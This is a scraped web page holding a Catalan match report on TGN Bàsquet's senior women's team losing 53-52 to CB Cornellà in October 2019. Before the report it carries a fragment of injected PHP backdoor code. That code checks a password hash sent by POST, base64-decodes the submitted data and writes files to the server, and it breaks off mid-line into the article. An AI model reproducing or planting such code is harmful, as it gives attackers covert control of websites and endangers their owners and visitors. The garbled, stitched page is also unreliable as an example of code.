function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior femení no pot contrarestar la intensitat del CB Cornellà i encaixa la primera derrota del curs (53-52) - Tgn Bàsquet Club -

El sènior femení no pot contrarestar la intensitat del CB Cornellà i encaixa la primera derrota del curs (53-52)

Updated: octubre 26, 2019

El TGN Bàsquet ha perdut la imbatibilitat a la lliga després de caure per la mínima a la difícil pista del CB Cornellà. Les tarragonines, que havien guanyat els seus primers quatre partits, han perdut en un matx dominat gairebé sempre per les locals tot i que en l’últim minut les visitants han tingut el triomf a les mans. Les de Cornellà de Llobregat han sabut aturar molt bé la base Laura Pascual i l’equip ho ha pagat en molts moments tot i el bon partit de la jove Sofía Llanos que, amb 21 punts, ha estat la màxima encistelladora del matx amb molt bons percentatges de tir (4/6 triples).

El partit s’ha començat a decidir en el primer quart. Tot i que encara faltava molt matx per endavant, els nou punts d’avantatge de les locals després dels 10 primers minuts ha estat clau per entendre la derrota lila. L’esforç per anar retallant diferències ha estat massa pel TGN Bàsquet tot i que a ha estat a punt d’aconseguir el triomf. El CB Cornellà, amb tres triples en el primer període, molta activitat defensiva i una atenció constant sobre Pascual, que ha rebut defenses mixtes, ha obert una escletxa important (17-8).

En el segon quart, el TGN Bàsquet ha reaccionat. L’equip que entrena Víctor Neila ha trobat amb més facilitat el camí cap al cèrcol (especialment Llanos, que en aquest període ha fet 12 punts, tres triples inclosos) i ha retallat diferències, tot i que no ha estat prou contundent en defensa (32-28).

El partit estava obert després de la reacció de les tarragonines però el CB Cornellà ha sortit molt bé a l’inici del tercer quart, d’igual forma que ho havia fet al començament del partit. Així, un parcial de 8-2 situava un marcador de 40-30, un desavantatge que semblava gran vista la poca anotació del partit. Però el TGN Bàsquet no s’ha rendit i amb molt de treball ha anat retallant diferències i arribar a l’últim període quatre punts per sota (43-39).

L’últim quart ha estat gairebé un cara o creu. Han estat minuts defensius molt bons del TGN Bàsquet —o, com  a mínim, els millors del partit— en un matx on tot i la intensitat defensiva dels dos equips, els col·legiats només han xiulat 26 faltes en total (14 per les locals i 12 per les tarragonines). Excepte un moment en què el CB Cornellà ha gaudit d’un avantatge de cinc punts (46-41), la resta del període s’ha desenvolupat en diferències per sota dels tres punts fins que el TGN Bàsquet ha capgirat el resultat (49-50) a poc més d’un minut pel final. En un breu intercanvi de cistelles, un bàsquet d’Ona Fort semblava que atorgaria el triomf a les visitants (51-52) però les locals han estat més espavilades: han tret de fons molt de pressa després d’encaixar la cistella i això ha agafat despistat el TGN Bàsquet que ha vist com el seu rival anotava pràcticament en solitari i s’enduia el triomf.

Amb aquesta derrota, el balanç del TGN Bàsquet és de quatre victòries i una derrota, el mateix que el del CB Cornellà.